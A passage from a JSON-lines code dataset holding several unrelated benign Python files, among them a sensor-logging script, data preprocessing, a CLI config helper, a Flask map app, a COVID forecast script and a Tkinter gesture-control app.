AIO.feeds(\"testsi7021temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testsi7021temperature\")\n TEMPERATURE_SI7021_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_SI7021_FEED = AIO.feeds(\"testsi7021humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testsi7021humidity\")\n HUMIDITY_SI7021_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_DHT22_FEED = AIO.feeds(\"testdht22temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testdht22temperature\")\n TEMPERATURE_DHT22_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_DHT22_FEED = AIO.feeds(\"testdht22humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testdht22humidity\")\n HUMIDITY_DHT22_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_MPL115A2_FEED = AIO.feeds(\"testmpl115a2temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testmpl115a2temperature\")\n TEMPERATURE_MPL115A2_FEED = AIO.create_feed(FEED)\n\ntry:\n PRESSURE_MPL115A2_FEED = AIO.feeds(\"testmpl115a2pressure\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testmpl115a2pressure\")\n PRESSURE_MPL115A2_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_BME680_FEED = AIO.feeds(\"testbme680temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680temperature\")\n TEMPERATURE_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n PRESSURE_BME680_FEED = AIO.feeds(\"testbme680pressure\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680pressure\")\n PRESSURE_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_BME680_FEED = AIO.feeds(\"testbme680humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680humidity\")\n HUMIDITY_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n GAS_BME680_FEED = AIO.feeds(\"testbme680gas\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680gas\")\n GAS_BME680_FEED = AIO.create_feed(FEED)\n\n# Access the Si7021 sensor\nSI7021_SENSOR = Si7021(SMBus(1))\n\n# Access the DHT22 device driver using pin 4\nDHT_SENSOR = Adafruit_DHT.DHT22\nDHT_PIN = 4\n\n# Access the MPL115A2 device driver using I2C bus\nI2C = busio.I2C(board.SCL, board.SDA)\nMPL_SENSOR = adafruit_mpl115a2.MPL115A2(I2C)\n\n# Access and setup the BME680 sensor\ntry:\n BME680_SENSOR = bme680.BME680(bme680.I2C_ADDR_PRIMARY)\nexcept IOError:\n BME680_SENSOR = bme680.BME680(bme680.I2C_ADDR_SECONDARY)\n\nBME680_SENSOR.set_humidity_oversample(bme680.OS_2X)\nBME680_SENSOR.set_pressure_oversample(bme680.OS_4X)\nBME680_SENSOR.set_temperature_oversample(bme680.OS_8X)\nBME680_SENSOR.set_filter(bme680.FILTER_SIZE_3)\nBME680_SENSOR.set_gas_status(bme680.ENABLE_GAS_MEAS)\nBME680_SENSOR.set_gas_heater_temperature(320)\nBME680_SENSOR.set_gas_heater_duration(150)\nBME680_SENSOR.select_gas_heater_profile(0)\n\ndef celsius_to_fahrenheit(celsius):\n \"\"\" convert celsius to fahrenheit \"\"\"\n fahrenheit = (celsius * (9.0/5.0)) + 32.0\n return fahrenheit\n\ndef pressure_to_kpa(pressure):\n \"\"\" convert 1000 Pa to kpi \"\"\"\n kpa = pressure / 10.0\n return kpa\n\n# send temperature and humidity to adafruit.io\nwhile True:\n\n # collect and post data once per minute\n time.sleep(45.0)\n\n # SI7021 sensor data\n HUMIDITY, CELSIUS = SI7021_SENSOR.read()\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_SI7021_FEED.key, VALUE)\n AIO.send_data(HUMIDITY_SI7021_FEED.key, HUMIDITY)\n\n time.sleep(5.0) # delay between posts\n # DHT22 sensor data\n HUMIDITY, CELSIUS = Adafruit_DHT.read_retry(DHT_SENSOR, DHT_PIN)\n if HUMIDITY is not None and CELSIUS is not None:\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_DHT22_FEED.key, VALUE)\n AIO.send_data(HUMIDITY_DHT22_FEED.key, HUMIDITY)\n\n time.sleep(5.0) # delay between posts\n # MPL115A2 sensor data\n CELSIUS = MPL_SENSOR.temperature\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_MPL115A2_FEED.key, VALUE)\n PRESSURE = MPL_SENSOR.pressure\n VALUE = pressure_to_kpa(PRESSURE)\n AIO.send_data(PRESSURE_MPL115A2_FEED.key, VALUE)\n\n time.sleep(5.0) # delay between posts\n # BME680 sensor data\n if BME680_SENSOR.get_sensor_data():\n CELSIUS = BME680_SENSOR.data.temperature\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_BME680_FEED.key, VALUE)\n PRESSURE = BME680_SENSOR.data.pressure\n VALUE = pressure_to_kpa(PRESSURE)\n AIO.send_data(PRESSURE_BME680_FEED.key, VALUE)\n HUMIDITY = BME680_SENSOR.data.humidity\n AIO.send_data(HUMIDITY_BME680_FEED.key, HUMIDITY)\n if BME680_SENSOR.data.heat_stable:\n GAS = BME680_SENSOR.data.gas_resistance\n AIO.send_data(GAS_BME680_FEED.key, GAS)\n","repo_name":"parttimehacker/sensor-testbed","sub_path":"testbed.py","file_name":"testbed.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33108319228","text":"from constants import *\nfrom utils import *\nfrom nltk.tokenize import TweetTokenizer\n# from nltk import pos_tag\nfrom collections import Counter\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef build_docs_vocab():\n if os.path.exists(OUTPUT_VOCAB_PATH):\n print(\"Vocab exists in {}\".format(OUTPUT_VOCAB_PATH))\n return load_text_as_list(OUTPUT_VOCAB_PATH)\n input_valid_docs = read_json(\"data/pod/meta/train_test.json\")[\"train\"]\n tokenizer = TweetTokenizer()\n corpus = []\n for file_name in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building vocabulary\"):\n doc_id = file_name[:-5]\n if doc_id in input_valid_docs:\n doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n for post in doc_data.values():\n tokens = [t for t in tokenizer.tokenize(post[\"t\"].lower()) if t not in EXCLUDED_WORDS]\n corpus.extend(tokens)\n word_count = Counter(corpus).most_common(MAX_VOCAB_SIZE)\n vocab = [w[0] for w in word_count if w[1] >= MIN_VOCAB_COUNT]\n save_list_as_text(vocab, OUTPUT_VOCAB_PATH)\n print(\"Create vocab at {}\".format(OUTPUT_VOCAB_PATH))\n return vocab\n\n\ndef build_docs_users():\n if os.path.exists(OUTPUT_USER_PATH):\n print(\"Users exists in {}\".format(OUTPUT_USER_PATH))\n return load_text_as_list(OUTPUT_USER_PATH)\n user_corpus = []\n for file_name in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building users\"):\n doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n for post in doc_data.values():\n user_corpus.append(post[\"a\"])\n word_count = Counter(user_corpus).most_common(MAX_USER_SIZE)\n users = [w[0] for w in word_count if w[1] >= MIN_USER_COUNT]\n save_list_as_text(users, OUTPUT_USER_PATH)\n return users\n\n\ndef build_expertise_vectors():\n if os.listdir(OUTPUT_USER_PCA_DIR):\n print(\"User expertise exists in {}\".format(OUTPUT_USER_PCA_DIR))\n return\n users = build_docs_users()\n user_participated_se_map = read_json(OUTPUT_USER_PARTICIPATED_SE_MAP_PATH)\n\n user_ses_list = [user_participated_se_map[user] if user in user_participated_se_map else []\n for user in users]\n mlb = MultiLabelBinarizer()\n user_one_hot_mtx = mlb.fit_transform(user_ses_list)\n\n print(\"Fit scaler\")\n scaler = MinMaxScaler()\n scaler_batch_size = 1024\n i = 0\n while i < len(user_one_hot_mtx):\n scaler.partial_fit(user_one_hot_mtx[i: i + scaler_batch_size])\n i += scaler_batch_size\n scaled_user_embedding = []\n i = 0\n while i < len(user_one_hot_mtx):\n scaled_user_embedding_batch = scaler.transform(user_one_hot_mtx[i: i + scaler_batch_size])\n scaled_user_embedding.extend(scaled_user_embedding_batch)\n i += scaler_batch_size\n unk_user_embedding = np.zeros(len(scaled_user_embedding[0]))\n scaled_user_embedding = np.vstack([unk_user_embedding] + scaled_user_embedding)\n\n for num_components in tqdm(range(5, 300, 5), desc=\"Building PCA for user expertise\"):\n pca = PCA(n_components=num_components)\n reduced_user_embedding = pca.fit_transform(scaled_user_embedding)\n save_to_pickle(reduced_user_embedding, OUTPUT_USER_PCA_RESULT_PATH.format(num_components))\n save_to_pickle(pca, OUTPUT_USER_PCA_PATH.format(num_components))\n\n\ndef plot_explained_variance():\n pca_data = []\n for file_name in os.listdir(OUTPUT_USER_PCA_DIR):\n if file_name.startswith(\"pca\"):\n pca = load_from_pickle(os.path.join(OUTPUT_USER_PCA_DIR, file_name))\n explained_variance = pca.explained_variance_ratio_\n summed_explained_variance = np.sum(explained_variance)\n pca_data.append((pca.n_components_, summed_explained_variance))\n\n sorted_pca_data = sorted(pca_data, key=lambda x: x[0])\n percentage_explained_var_list = [x[1] * 100 for x in sorted_pca_data]\n\n num_component_list = [x[0] for x in sorted_pca_data]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(num_component_list, percentage_explained_var_list, 'b*-')\n ax.set_ylim((0, 100))\n plt.grid(True)\n plt.xlabel('Number of principle components')\n plt.ylabel('Percentage of variance explained (%)')\n plt.savefig(\"pca.png\")\n\n\ndef analyse_all_class_distribution():\n doc_ses = read_json(OUTPUT_DOC_SE_MAP_PATH)\n train_test_path = os.path.join(OUTPUT_META_DIR, \"train_test.json\")\n train_test = read_json(train_test_path)\n standard_se_map = read_json(OUTPUT_STANDARD_SE_MAP_PATH)\n side_effects = set(standard_se_map.values())\n print(len(side_effects))\n train_docs = train_test[\"train\"]\n val_docs = train_test[\"val\"]\n test_docs = train_test[\"test\"]\n print(\"Train\")\n analyse_class_distribution(doc_ses, train_docs, side_effects)\n print(\"Val\")\n analyse_class_distribution(doc_ses, val_docs, side_effects)\n print(\"Test\")\n analyse_class_distribution(doc_ses, test_docs, side_effects)\n\n\ndef analyse_class_distribution(doc_ses, docs, side_effects, k=5):\n class_corpus = []\n [class_corpus.extend(doc_ses[doc]) for doc in docs]\n class_counter = Counter(class_corpus).most_common()\n class_percentage = [(cls, cnt/len(docs)) for cls, cnt in class_counter]\n all_classes = set([x[0] for x in class_counter])\n top_k_classes = class_percentage[:k]\n bottom_k_classes = class_percentage[::-1][:k]\n missing_classes = side_effects.difference(all_classes)\n print(\"Top {} classes: \".format(top_k_classes))\n print(\"Bottom {} classes: \".format(bottom_k_classes))\n print(\"Missing classes: {}, {}\".format(missing_classes, len(missing_classes)))\n\n\nNEG = \"NEG\"\nFCONJ = \"FCONJ\"\nCCONJ = 'CCONJ'\nICONJ = 'ICONJ'\nSMODAL = 'SMODAL'\nWMODAL = 'WMODAL'\nCOND = 'COND'\nADVERB = 'ADVERB'\nADJECTIVE = 'ADJECTIVE'\nPNOUN = 'PNOUN'\nCNOUN = 'CNOUN'\nFPERSON = 'FPERSON'\nSPERSON = 'SPERSON'\nTPERSON = 'TPERSON'\nDDET = 'DDET'\nIDET = 'IDET'\nOTHER = 'OTHER'\n\nALL_TAGS = [NEG, FCONJ, CCONJ, ICONJ, SMODAL, WMODAL, COND, ADVERB, ADJECTIVE,\n PNOUN, CNOUN, FPERSON, SPERSON, TPERSON, DDET, IDET, OTHER]\nTAG2IDX = {tag: i for i, tag in enumerate(ALL_TAGS)}\n\n\ndef classify_pos_tag(token, tag):\n if token in [\"no\", \"not\", \"neither\", \"nor\", \"never\"]:\n return NEG\n if token in [\"but\", \"however\", \"nevertheless\", \"otherwise\", \"yet\", \"still\", \"nonetheless\"]:\n return FCONJ\n if token in [\"till\", \"until\", \"despite\", \"inspite\", \"though\", \"although\"]:\n return CCONJ\n if token in [\"therefore\", \"furthermore\", \"consequently\", \"thus\", \"as\", \"subsequently\", \"eventually\", \"hence\"]:\n return ICONJ\n if token in [\"might\", \"could\", \"can\", \"would\", \"may\"]:\n return SMODAL\n if token in [\"should\", \"ought\", \"need\", \"shall\", \"will\", \"must\"]:\n return WMODAL\n if token in [\"if\"]:\n return COND\n if tag[:2] == \"RB\":\n return ADVERB\n if tag[:2] == \"JJ\":\n return ADJECTIVE\n if tag in [\"NNP\", \"NNPS\"]:\n return PNOUN\n if tag in [\"NN\", \"NNS\"]:\n return CNOUN\n if token in [\"i\", \"we\", \"me\", \"us\", \"my\", \"mine\", \"our\", \"ours\"]:\n return FPERSON\n if token in [\"you\", \"your\", \"yours\"]:\n return SPERSON\n if token in [\"he\", \"she\", \"him\", \"her\", \"his\", \"it\", \"its\", \"hers\", \"they\", \"them\", \"their\", \"theirs\"]:\n return TPERSON\n if tag[:2] == \"DT\" and token[:2] == \"th\":\n return DDET\n elif tag[:2] == \"DT\":\n return IDET\n return OTHER\n\n\n# def pos_tag_post(post_tokens):\n# tagged_tokens = pos_tag(post_tokens)\n# return [classify_pos_tag(token, tag) for token, tag in tagged_tokens]\n#\n#\n# def build_style_vector():\n# if os.path.exists(OUTPUT_USER_STYLE_MATRIX_PATH):\n# print(\"User style matrix exists in {}\".format(OUTPUT_USER_STYLE_MATRIX_PATH))\n# return load_from_pickle(OUTPUT_USER_STYLE_MATRIX_PATH)\n# input_valid_docs = read_json(\"data/pod/meta/train_test.json\")[\"train\"]\n# all_users = build_docs_users()\n# tokenizer = TweetTokenizer()\n# user_style_corpus = {}\n# for file_name in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building user style vector\"):\n# doc_id = file_name.replace(\".json\", \"\")\n# if doc_id in input_valid_docs:\n# doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n# for post in doc_data.values():\n# tokens = [t for t in tokenizer.tokenize(post[\"t\"].lower()) if t not in EXCLUDED_WORDS]\n# user = post[\"a\"]\n# styles = pos_tag_post(tokens)\n# if user not in user_style_corpus:\n# user_style_corpus[user] = []\n# user_style_corpus[user].extend(styles)\n# user_style_mtx = []\n# for user in all_users:\n# user_style_vector = np.zeros(len(ALL_TAGS))\n# if user in user_style_corpus:\n# style_corpus = user_style_corpus[user]\n# corpus_size = len(style_corpus)\n# style_count = Counter(style_corpus).most_common()\n# for style, cnt in style_count:\n# user_style_vector[TAG2IDX[style]] += (float(cnt) / corpus_size)\n# user_style_mtx.append(user_style_vector)\n# unk_user_embedding = np.zeros(len(ALL_TAGS))\n# user_style_mtx = np.vstack([unk_user_embedding] + user_style_mtx)\n# save_to_pickle(user_style_mtx, OUTPUT_USER_STYLE_MATRIX_PATH)\n# min_max_scaler = MinMaxScaler()\n# user_style_mtx = min_max_scaler.fit_transform(user_style_mtx)\n# return user_style_mtx\n\n\nif __name__ == \"__main__\":\n build_docs_vocab()\n build_docs_users()\n build_expertise_vectors()\n # build_style_vector()\n plot_explained_variance()\n # analyse_all_class_distribution()\n","repo_name":"nguyenvanhoang7398/NEAT","sub_path":"preprocessing_data.py","file_name":"preprocessing_data.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40581865373","text":"from zpy.files import to_pathlib_path\nimport os\nimport yaml\n\nENDPOINT = \"https://ragnarok.zumok8s.org\"\nCONFIG_FILE = \"~/.zpy/config.yaml\"\n\n\ndef initialize_config():\n \"\"\"initialize config\n\n If CONFIG_FILE doesnt exist write it and put in prod as the endpoint. Also creates\n the ~/.zpy folder if not existing. The config is some variables needed by the cli to\n make validated requests to the backend.\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(CONFIG_FILE))\n if path.exists():\n return\n CONFIG = {\"ENVIRONMENT\": \"prod\", \"TOKEN\": None, \"ENDPOINT\": ENDPOINT}\n path.parent.mkdir(parents=True, exist_ok=True)\n write_config(CONFIG)\n\n\ndef read_config(file=CONFIG_FILE):\n \"\"\"read config\n\n Read zpy cli configuration file.\n\n Args:\n env: which enviroment to read config for\n Returns:\n config: dictionary of current configuration\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(file))\n with path.open() as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n\n\ndef write_config(config, file=CONFIG_FILE):\n \"\"\"write config\n\n Write zpy cli configuration file.\n\n Args:\n config (dict): new configuration to write\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(file))\n with path.open(\"w\") as f:\n yaml.dump(config, f)\n\n\ndef add_env(name, endpoint):\n \"\"\"add environment\n\n Add a new environment configuration file.\n\n Args:\n name: name of the environment\n endpoint: endpoint for the new enviroment\n \"\"\"\n new_config = {\"ENVIRONMENT\": name, \"TOKEN\": None, \"ENDPOINT\": endpoint}\n write_config(new_config, file=f\"~/.zpy/{name}.yaml\")\n\n\ndef swap_env(name):\n \"\"\"swap environment\n\n Swap the current environment configuration.\n\n Args:\n name: swap to this env\n \"\"\"\n old_config = read_config()\n new_config = read_config(file=f\"~/.zpy/{name}.yaml\")\n write_config(new_config)\n write_config(old_config, file=f\"~/.zpy/{old_config['ENVIRONMENT']}.yaml\")\n","repo_name":"ZumoLabs/zpy","sub_path":"cli/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"37"} +{"seq_id":"17383902705","text":"'''\nThe module creates UI using flask.\n'''\n\nfrom flask import Flask, render_template, request\nfrom geopy.geocoders import Nominatim\nfrom folium_map import create_map\nfrom api import api_file_retriever\n\napp = Flask(__name__)\n\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n@app.route('/')\ndef index():\n '''\n Returns main template of the site.\n '''\n return render_template('index.html')\n\n@app.route('/submit', methods = ['POST'])\ndef submit():\n '''\n Returns a site for navigation\nin the file.\n '''\n if not request.form.get('submission_user_name'):\n return render_template('error.html')\n\n geolocator = Nominatim(user_agent = 'JsonMaps')\n user_name = request.form.get('submission_user_name')\n try:\n friends_json = api_file_retriever(user_name)\n except:\n return render_template('error.html')\n\n locations = []\n names = []\n lenght = 0\n for friend in friends_json['users']:\n if lenght == 5:\n break\n coordinates = geolocator.geocode(friend['location'], exactly_one=True)\n if coordinates is None:\n continue\n locations.append(coordinates)\n names.append(friend['screen_name'])\n lenght += 1\n\n create_map(zip(locations, names))\n\n return render_template('map/JSON_map.html')\n\n@app.route('/get_back', methods = ['POST'])\ndef get_back():\n '''\n Returns a main site template.\n '''\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"normangalt/json_map","sub_path":"flask_ui.py","file_name":"flask_ui.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22773293339","text":"#!/usr/bin/python3\n\nimport os\nimport json\nimport pandas as pd\nimport pmdarima as pm\nimport datetime\n\n\nfileDir = os.getcwd()\n\nwith open(fileDir + '/covidDict.json') as f:\n data = json.load(f)\n\ndateFormat = '%Y-%m-%d'\n\n# Set forecast day count\nforecastDays = 5\n\n# Delete Serbia's data for now. It's recovery data needs correction.\ndel data['Serbia']\n\ncollectDeleteCountries = []\n\n# Loop countries to create forecast data\nfor country in data:\n tempArray = [['Date', 'Confirmed', 'Recovered', 'Deaths']]\n for d in data[country]['data']:\n if data[country]['data'][d]['confirmed'] > 0:\n tempArray.append([d, data[country]['data'][d]['confirmed'], data[country]['data'][d]['recovered'], data[country]['data'][d]['deaths']])\n\n lastDay = d\n\n # If data is less than 10 days, drop the country data for now\n if len(tempArray) < 11:\n collectDeleteCountries.append(country)\n continue\n\n lastDay = datetime.datetime.strptime(lastDay, dateFormat)\n\n df = pd.DataFrame(tempArray[1:])\n df.columns = tempArray[0]\n\n df['Date']=pd.to_datetime(df['Date'])\n df.set_index('Date', inplace=True)\n\n # Forecast next 7 days for confirmed\n confirmed_model = pm.auto_arima(df['Confirmed'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n confirmed_model.fit(df['Confirmed'])\n\n forecast_confirmed = confirmed_model.predict(n_periods=forecastDays)\n\n # Forecast next 7 days for recovered\n recovered_model = pm.auto_arima(df['Recovered'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n recovered_model.fit(df['Recovered'])\n\n forecast_recovered = recovered_model.predict(n_periods=forecastDays)\n\n # Forecast next 7 days for deaths\n deaths_model = pm.auto_arima(df['Deaths'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n deaths_model.fit(df['Deaths'])\n\n forecast_deaths = deaths_model.predict(n_periods=forecastDays)\n\n for i in range (len(forecast_confirmed)):\n lastDay = lastDay + datetime.timedelta(days=1)\n data[country]['data'][str(lastDay.date())] = {\n 'confirmed': int(round(forecast_confirmed[i])),\n 'recovered': int(round(forecast_recovered[i])),\n 'deaths': int(round(forecast_deaths[i])),\n }\n\n\n# If data is less than 10 days, drop the country data for now\nfor c in collectDeleteCountries:\n del data[c]\n\ncountryList = []\nfor key in data.keys():\n countryList.append(data[key])\n\n\ndailyGeneralData = {}\nfor key in data.keys():\n for dayDate in data[key][\"data\"]:\n dayObj = {x: data[key][\"data\"][dayDate][x] for x in data[key][\"data\"][dayDate].keys()}\n dayObj.update({\"date\": dayDate})\n\n if dayDate in dailyGeneralData:\n dailyGeneralData[dayDate][\"confirmed\"] += data[key][\"data\"][dayDate][\"confirmed\"]\n dailyGeneralData[dayDate][\"recovered\"] += data[key][\"data\"][dayDate][\"recovered\"]\n dailyGeneralData[dayDate][\"deaths\"] += data[key][\"data\"][dayDate][\"deaths\"]\n else:\n dailyGeneralData[dayDate] = dayObj\n\n\ndailyGeneralDataList = []\nfor key in dailyGeneralData.keys():\n dailyGeneralDataList.append(dailyGeneralData[key])\n\n\nwith open('covidDictForecast.json', 'w') as jsonFile:\n json.dump(data, jsonFile)\n\nwith open('covidForecast.json', 'w') as jsonFile:\n json.dump(countryList, jsonFile)\n\nwith open('graphForecast.json', 'w') as jsonFile:\n json.dump(dailyGeneralDataList, jsonFile)\n\nlastUpdated = {\"lastUpdated\": datetime.datetime.utcnow().strftime(\"%d/%m/%Y %H:%M:%S\") + \" UTC\"}\nwith open('updated.json', 'w') as jsonFile:\n json.dump(lastUpdated, jsonFile)\n","repo_name":"stfurkan/pancovid19","sub_path":"python/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72745004908","text":"import webbrowser\n\n\nclass Movie():\n \"\"\" A for the movie class\"\"\"\n\n def __init__(self,\n movie_title,\n movie_storyline,\n trailer_url,\n movie_poster,\n movie_ratings):\n \"\"\" Creates new instances of the classes\"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.trailer_youtube_url = trailer_url\n self.poster_image_url = movie_poster\n self.ratings = movie_ratings\n\n def play_trailer(self):\n \"\"\"This function plays the trailer from an URL\"\"\"\n webbrowser.open(self.url)\n\n def show_poster(self):\n \"\"\"This function shows the poster from an URL\"\"\"\n webbrowser.open(self.movie_poster)\n","repo_name":"bani890/movie_review_py","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36019383330","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom pathlib import Path\nimport pyautogui\nimport os\nimport cv2\nimport numpy as np\nimport mediapipe as mp\nfrom tensorflow.keras.models import load_model\nfrom time import sleep\nimport threading\nimport datetime\nimport json\n\nroot = Tk()\nroot.title(\"Gesture Control\")\n\n###################\n## Settings ##\n###################\n\nframe_setting = LabelFrame(root, text = \"Settings\", width = 780, pady=5)\nframe_setting.grid(row=0, column=0)\n\n# We divide the frame into a 26 column grid\nfor i in range(26):\n frame_setting.columnconfigure(i,{'minsize':30})\n\n# Stay on top check box\ncheckbox_stay_top = BooleanVar()\n\ndef stay_on_top():\n global checkbox_stay_top\n if checkbox_stay_top.get():\n root.attributes('-topmost',True)\n else:\n root.attributes('-topmost',False)\n\nCheckbutton(frame_setting, text=\"Always stay on top (Windows)\", variable=checkbox_stay_top, onvalue=True, offvalue=False, command=stay_on_top).grid(row=0, column = 1, columnspan=10, pady = 5, sticky=W)\n\n# Sleep Interval\nsleep_interval = Entry(frame_setting, width=3)\nsleep_interval.grid(row=1, column=1, pady = 5)\nlabel_sleep_interval = Label(frame_setting, text = \"Sleep interval between gestures' action in seconds\").grid(row=1, column=2, columnspan=10,pady=10, sticky=W)\n\n# About info\nlabel_about1 = Label(frame_setting, text=\"Developed by erjieyong@gmail.com\", font=\"Serif 7\").grid(row=0, column = 20, columnspan=5, pady = 5, sticky=E)\n\n# Column labels\nlabel_gesture_name = Label(frame_setting, text = \"Name\", font=\"bold 10\").grid(row=2, column=1, columnspan=2)\nlabel_gestures = Label(frame_setting, text = \"Gestures\", font=\"bold 10\").grid(row=2, column=4, columnspan=2)\nlabel_keystroke = Label(frame_setting, text = \"Keystroke Assignment\", font=\"bold 10\").grid(row=2, column=7, columnspan=5)\n\nlabel_gesture_name = Label(frame_setting, text = \"Name\", font=\"bold 10\").grid(row=2, column=14, columnspan=2)\nlabel_gestures = Label(frame_setting, text = \"Gestures\", font=\"bold 10\").grid(row=2, column=17, columnspan=2)\nlabel_keystroke = Label(frame_setting, text = \"Keystroke Assignment\", font=\"bold 10\").grid(row=2, column=21, columnspan=5)\n\n# Get all gestures from folder\nimages_gen = Path(\"./Images\").glob(\"*.png\")\nimages = [str(img) for img in images_gen]\nimages_name = [str(img)[7:-4] for img in images]\n\n# Display gestures. We need to store the image in a dict otherwise it will be garbage collected\ngesture_img_dict = {'name':{}, 'img':{}, 'keystroke':{}}\nkeystroke_list = ['accept', 'add', 'alt', 'altleft', 'altright', 'apps', 'backspace',\n'browserback', 'browserfavorites', 'browserforward', 'browserhome',\n'browserrefresh', 'browsersearch', 'browserstop', 'capslock', 'clear',\n'convert', 'ctrl', 'ctrlleft', 'ctrlright', 'decimal', 'del', 'delete',\n'divide', 'down', 'end', 'enter', 'esc', 'escape', 'execute', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11', 'f12'\n'final', 'fn', 'hanguel', 'hangul', 'hanja', 'help', 'home', 'insert', 'junja',\n'kana', 'kanji', 'launchapp1', 'launchapp2', 'launchmail',\n'launchmediaselect', 'left', 'modechange', 'multiply', 'nexttrack',\n'nonconvert', 'num0', 'num1', 'num2', 'num3', 'num4', 'num5', 'num6',\n'num7', 'num8', 'num9', 'numlock', 'pagedown', 'pageup', 'pause', 'pgdn',\n'pgup', 'playpause', 'prevtrack', 'print', 'printscreen', 'prntscrn',\n'prtsc', 'prtscr', 'return', 'right', 'scrolllock', 'select', 'separator',\n'shift', 'shiftleft', 'shiftright', 'sleep', 'space', 'stop', 'subtract', 'tab',\n'up', 'volumedown', 'volumemute', 'volumeup', 'win', 'winleft', 'winright', 'yen',\n'command', 'option', 'optionleft', 'optionright']\nfor i in range(5):\n # Set name\n gesture_img_dict['name'][i] = Label(frame_setting, text = images_name[i]).grid(row=i+3, column = 1, columnspan = 2)\n gesture_img_dict['name'][i+5] = Label(frame_setting, text = images_name[i+5]).grid(row=i+3, column = 14, columnspan = 2)\n # Set images into 2 separate columns\n gesture_img_dict['img'][i] = ImageTk.PhotoImage(Image.open(images[i]))\n gesture_img_dict['img'][i+5] = ImageTk.PhotoImage(Image.open(images[i+5]))\n Label(frame_setting, image = gesture_img_dict['img'][i]).grid(row = i+3, column = 4, columnspan=2)\n Label(frame_setting, image = gesture_img_dict['img'][i+5]).grid(row = i+3, column = 17, columnspan=2)\n # Set drop down list\n gesture_img_dict['keystroke'][i] = StringVar()\n gesture_img_dict['keystroke'][i+5] = StringVar()\n OptionMenu(frame_setting, gesture_img_dict['keystroke'][i], *keystroke_list).grid(row = i+3, column = 7, columnspan=5)\n OptionMenu(frame_setting, gesture_img_dict['keystroke'][i+5], *keystroke_list).grid(row = i+3, column = 21, columnspan=5)\n \n# Set default keystroke values\nif os.path.exists('saved_keystrokes.txt'):\n # Get saved keystrokes from txt file in current directory\n with open('.\\saved_keystrokes.txt', 'r') as f:\n keystrokes = json.loads(f.readline())\n # update setting keystroke to display according to previous saved value\n gesture_img_dict['keystroke'][0].set(keystrokes[\"call_me\"]) #call_me\n gesture_img_dict['keystroke'][1].set(keystrokes[\"fist\"]) #fist\n gesture_img_dict['keystroke'][2].set(keystrokes[\"live_long\"]) #live_long\n gesture_img_dict['keystroke'][3].set(keystrokes[\"okay\"]) #okay\n gesture_img_dict['keystroke'][4].set(keystrokes[\"peace\"]) #peace\n gesture_img_dict['keystroke'][5].set(keystrokes[\"rock\"]) #rock\n 